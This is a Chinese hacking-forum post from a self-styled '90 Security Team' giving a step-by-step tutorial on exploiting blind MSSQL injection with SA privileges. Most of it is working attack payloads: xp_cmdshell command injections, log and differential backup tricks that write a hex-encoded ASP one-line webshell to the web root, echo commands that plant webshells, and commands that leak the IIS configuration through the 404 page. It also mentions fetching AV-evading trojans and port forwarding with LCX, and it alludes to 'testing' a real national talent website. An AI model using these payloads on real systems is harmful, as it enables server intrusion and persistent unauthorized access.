找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2181|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————! E9 y/ `9 Y6 r- y; ]2 J

( r: Z& V' N9 ], ]/ q+ l6 R9 z$ D* Z$ R9 Z" e6 h
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。8 ^( r, d& Z# e; y

/ h4 D% N# S! U4 ?0 R( ], h7 x$ \5 [                                                                 6 {& k: }6 s! u8 x6 L9 c
                                                                 
( f: H9 }# x% ~! H) j. R                                                                  论坛: http://www.90team.net/
3 G# c3 m; s! B
2 I# r/ [* c3 I6 P
5 q0 n$ h4 x/ ~* T/ @. U
8 g) z7 c' X: i% R7 ^' s! a友情检测国家人才网: [/ K. |" N1 e8 @+ X4 M* J

/ E1 t+ X6 y# u" E" |$ W* P) P5 C$ Z
内容:MSSQL注入SA权限不显错模式下的入侵6 E7 x) M& L# ~( s% P0 J
& p4 a" A* k! z, v
' I) R5 v1 Z* u
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。3 J+ K7 G  P0 H) t3 K4 S& f; Y3 m

" y6 K2 }$ d0 i& D; |. J& G我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
' b8 s1 T. K1 v6 V5 W% i0 R6 }& E8 O6 n

5 l3 u' O3 C' g% J9 J9 e这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
* h& L2 ?, i+ Y$ M
$ R% x/ b( H3 Q  W7 r思路:8 Q9 L1 |7 m8 u. V/ [! H
! |/ C2 K  I1 _( _4 k
首先:
" s2 o1 j$ C3 i, ^. d' l0 m4 o$ h6 o% P8 g
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。2 B' |4 V! e6 k/ l  Q( l

) o, L  L2 p4 E8 s( o1.日志备份获得Webshell
) u, R. U- W% [/ s$ |# z' q! Z7 q7 A
2.数据库差异备份获得Webshell+ V  J, \" q- X7 ]' w9 J
# s  m5 R) ?2 z& F* e# z( {% u
4.直接下载免杀远控木马。
, U- h1 G$ ^2 W' r
7 O6 U; Q/ h# ~2 [' i8 s- F5.直接下载LCX将服务器端口转发出来' u/ M9 ~$ x7 B! k2 B# o: W& {
. L: M* x7 D& ^" N" j
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。$ j% G5 h$ B$ e+ V: Y. G
$ d# v$ I% G( I! K

6 y- F9 |" r3 r7 r7 c2 C( \
0 x) w- H9 D- R# h7 x) `+ v- \  c- L在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
9 f/ J3 Y1 z" w" o# {# Q+ |3 m: @( v: D  ~/ Z% @$ P. A4 n' e
我直接演示后面一个方法* ~2 `' k7 W1 ~! C- K! V

1 k9 a' I4 y) w) N+ n$ M
3 Z& u( ~6 ~/ v" S分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL % j2 K) ]4 f! B! A! J% N8 g8 Q

$ c- {5 G' f6 [' m0 V( O- U( `, J. D+ Y' C/ N* s1 J* B7 i
8 Z4 E- R: ?6 L; k7 _
, ?  A6 X7 B9 z
◆日志备份:7 [: x& ]1 Y1 Y1 |
" |6 v' H, W. E- s- x  r, h' N
& a! H3 g) |- O/ ^4 p0 @
1. 进行初始备份
- F" v1 {5 E5 S; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
- F( [/ W; C" f6 f, p0 r: g2 i4 _  E% u/ p
2. 插入数据
! T& d9 i/ z; v' x+ r: Z( `. X;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--5 ?7 h* a; s2 z' A# \

6 n) a0 g3 u1 ~0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>7 b$ y4 ~  u& O; O9 V$ I( i
  
: w$ M" d  ~/ _. t- e/ |8 {9 B3. 备份并获得文件,删除临时表
( T. m: j. X: r# o;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
3 B7 K; _( ?  `; a/ h
+ @& X7 U8 E5 P! y
; @3 R6 f2 N  z( z9 y. r
* D" m& K0 p9 n& F) `2 N8 U◆数据库差异备份
; S. p" C  p7 M& y8 g2 I" C
: W1 D' |# x0 i% G% z0 j% t(1. 进行差异备份准备工作
% }. E& q/ i+ ~* v& c/ H7 Y  N; Q3 i) k% E( w" X# @# Y$ d0 ^3 B' C) K7 {" k
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--0 e- q" F* K% m0 R

& s; ^; S% |7 Z# ^3 ]! b. `( S上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码3 g. W4 w1 [$ k* h% _# {4 }0 t* |

; S5 b8 _& m$ Q" k7 ~) m) e. X0 X, S% l8 z0 s# u% f. A7 \
(2. 将数据写入到数据库
* w: P* e+ M7 C$ ?;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
+ F, E- U; e5 ~3 j: z
1 N* I* e: Q1 @0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  Q# B7 T/ g& {$ _; X. u0 R% K9 ]' @/ [- s, L
3. 备份数据库并清理临时文件
* e! l8 W9 v$ k# u! G0 l9 J( ]& {6 S3 V
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--7 k( ~" t" s) q2 f
! Z1 _) F  t; S& c
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
5 g! }) ?  C& @
0 o$ m' \0 v1 h: e" U& b) ]1 t& @  L+ k: K9 w0 B
' q* z8 B. F, i& \' `
用^转义字符来写ASP(一句话木马)文件的方法:   ) v5 U3 A! X+ m

% c4 {4 N9 ~  h7 e+ o$ C1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
( u( Y/ P$ e/ R& _8 `( e; }% Z" E0 }7 K0 k+ D* z
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
6 x. s0 H% j' P; E' X$ S; v4 g
  x7 w' W4 @) e! T9 T3 s读取IIS配置信息获取web路径
- f$ K0 Z9 ?" H$ C! ?6 c# x7 e8 U) Q% ?( ^+ B# T
     
) _' ~/ i$ F: H4 k. t6 J     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--( a7 `* ~8 S. }
, W# P0 ~7 L. @  H: x) T4 `9 f; t) q1 T0 [
执行命令& H; Z" F0 i1 l- r
     2 Z5 z  [9 Z) N3 H$ P0 ~
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
. P; k4 @0 O. ~! ?! a8 S. {
; E. \: M) }5 p& W6 n+ g, `6 ]; m  m' Q" M; h

$ L- U6 F. H$ `9 R! ?
) T+ q/ H1 W# q& S  @. r# m: V& ^- N7 }$ p5 C
* B. P. ]( K1 f. g, J! c1 b
. i) i6 d6 o- q' }
4 w- @) A: R4 ^* M; e
2 j% T- A2 s  [$ G2 S# C3 M# t
- S* @& S, K) i8 ~

2 }4 b( n" Q( _# z
8 p) S7 f* l: [+ Q" l2 u) z8 u8 C9 t5 B- n
0 l( Z' Y5 G6 v1 ]

; Y) H* I, y7 p" Y! v+ J$ H( [5 V0 C. V- R$ \$ C, E3 T

* G) ]/ J% X# I
. m3 T' ^& N& e- [. O; O0 m& f% e
' R. K1 F3 L  n$ C# {0 g# K7 H

/ a; O4 \4 ]7 H& u
/ x) o2 [* u0 a$ A) x& j: \- `4 T$ ~
) G0 ~* W! p1 Z2 B$ i

- j1 T* e' z" |: n0 O- q: L+ s
: Z- A5 \; h7 [: e1 N
& D% m1 `/ g1 Q
9 w, ]" @" p9 |# U! j( q% b. u1 \, T. A' w

/ E% r  R1 D% Q9 _: z. R# }% _2 Y- F( x+ O" w- N
# E% I: g& m/ i; {
9 y+ K8 u4 L0 L* _1 _
5 w( y4 V& E( L. w  S7 _  T

) C; k( m6 r+ I
: u, F3 g: _  f8 W( w9 p5 a: M# x- Z

+ K8 J7 `7 g( P) [5 G% |9 L4 A# m) I/ ~5 ?; z
  \' {5 u: O+ K& v+ {

5 I8 |6 v, K, s' Z. I* f
/ H! \0 e* l8 u. T2 p
, L; l1 t. r4 u3 R/ Y" N
6 {- [7 |% K4 J* @- t2 s2 R
$ ?4 C, T  U2 Y: H5 X+ Z7 `$ z( a4 }! ?5 ?" {9 R% J- F8 _9 O

7 K1 Z) p0 q$ t( t
# R. R9 M' {6 V" }  b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表